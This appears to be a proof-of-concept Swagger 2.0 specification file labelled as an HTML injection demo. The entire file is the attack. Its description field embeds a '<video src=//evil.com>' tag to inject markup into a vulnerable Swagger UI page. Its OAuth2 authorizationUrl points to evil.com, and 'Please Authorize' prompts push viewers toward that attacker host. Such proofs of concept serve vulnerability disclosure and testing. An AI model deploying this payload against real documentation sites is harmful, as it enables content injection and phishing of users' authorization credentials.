swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: http://evil.com
info:
  version: "0.0.1"
  title: HTML Injection PoC by gilsgil64
  description: Please Authorize!<video src=//evil.com>
paths:
  /:
    get:
      responses:
        200:
          description: Please Authorize to see this content!
